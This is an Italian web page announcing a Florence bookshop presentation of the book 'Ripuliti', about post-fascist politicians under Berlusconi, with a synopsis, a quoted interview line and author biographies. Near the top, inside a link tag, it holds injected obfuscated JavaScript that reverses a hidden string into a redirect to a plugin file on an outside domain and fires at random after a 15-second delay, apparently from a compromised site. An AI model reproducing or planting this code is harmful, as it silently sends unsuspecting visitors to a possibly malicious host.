26 aprile, da Feltrinelli: "Ripuliti. Postfascisti durante e dopo Berlusconi"

image_pdfimage_print

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://altracitta.org/wp-content/uploads/2012/04/ripuliti.gif”>RIPULITI
Postfascisti durante e dopo Berlusconi
di Daniele Nalbone e Giacomo Russo Spena

Giovedì 26 aprile, Via de’ Cerretani, 30/32r – Firenze

Saranno presenti gli autori. Intervengono Ornella De Zordo e Saverio Tommasi

Fiuggi, gennaio 1995: con la benedizione di Gianfranco Fini nasce Alleanza Nazionale. Per la Destra radicale, fino a quel momento aderente al Movimento sociale italiano, si conclude un’epoca. Quel patrimonio politico e culturale riesce però a ricollocarsi grazie a una nascente figura politica: Silvio Berlusconi. Il Cavaliere, a partire dal sostegno dato allo stesso Fini per la sfida al Campidoglio del 1993, contro Francesco Rutelli, sdogana così i postfascisti e i neo-postfascisti, facendoli uscire fuori dai margini della politica. Berlusconi diventa, in meno di due anni, il punto di riferimento. Molti esponenti provenienti da quel mondo oggi siedono nei banchi del Parlamento italiano ed europeo e rivestono importanti cariche istituzionali. Chi un tempo apparteneva alle frange estreme adesso è legittimato a prendere decisioni e a influire sulle scelte politiche ed economiche del Paese, anche in questa fase di transizione. Ma chi sono i «ripuliti»? Il saggio-inchiesta di Daniele Nalbone e Giacomo Russo Spena ripercorre tutti i passaggi salienti del rapporto che l’estrema destra ha avuto (e ha) con il Pdl. Ricostruzioni che gli autori fanno anche attraverso interviste esclusive agli stessi protagonisti dello “sdoganamento” di questi ultimi due decenni: da Marcello de Angelis – ex Terza posizione, oggi deputato Pdl e direttore del Secolo d’Italia – ai politici Flavia Perina, Roberta Angelilli, Fabio Rampelli e tanti altri astri della galassia nera.

«Per noi Berlusconi ha avuto un ruolo strumentale. Scherzando – ma neanche troppo – un giorno spiegai a un ex Pci, deputato alla Camera, che per noi Berlusconi è la dittatura del proletariato, quella situazione teoricamente non auspicabile ma necessaria come passaggio, come momento di transizione, per arrivare all’anno zero». Marcello De Angelis, ex Terza Posizione, oggi Parlamentare Pdl.

*** GLI AUTORI ***

DANIELE NALBONE è giornalista di «Liberazione» e autore di: Le mani sulla città. Da Veltroni ad Alemanno storia di una capitale in vendita (2011), In prima persona. Lotte e vertenze dei comitati territoriali del Lazio (2010) e Cricca Economy. Dall’Aquila alla B2, gli affari del capitalismo dei disastri (2010).

GIACOMO RUSSO SPENA è giornalista di «Micromega». Collabora per «Il Fatto Quotidiano» e «Il Riformista». È stato redattore del quotidiano «il manifesto» e ha lavorato per diverse emittenti televisive.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *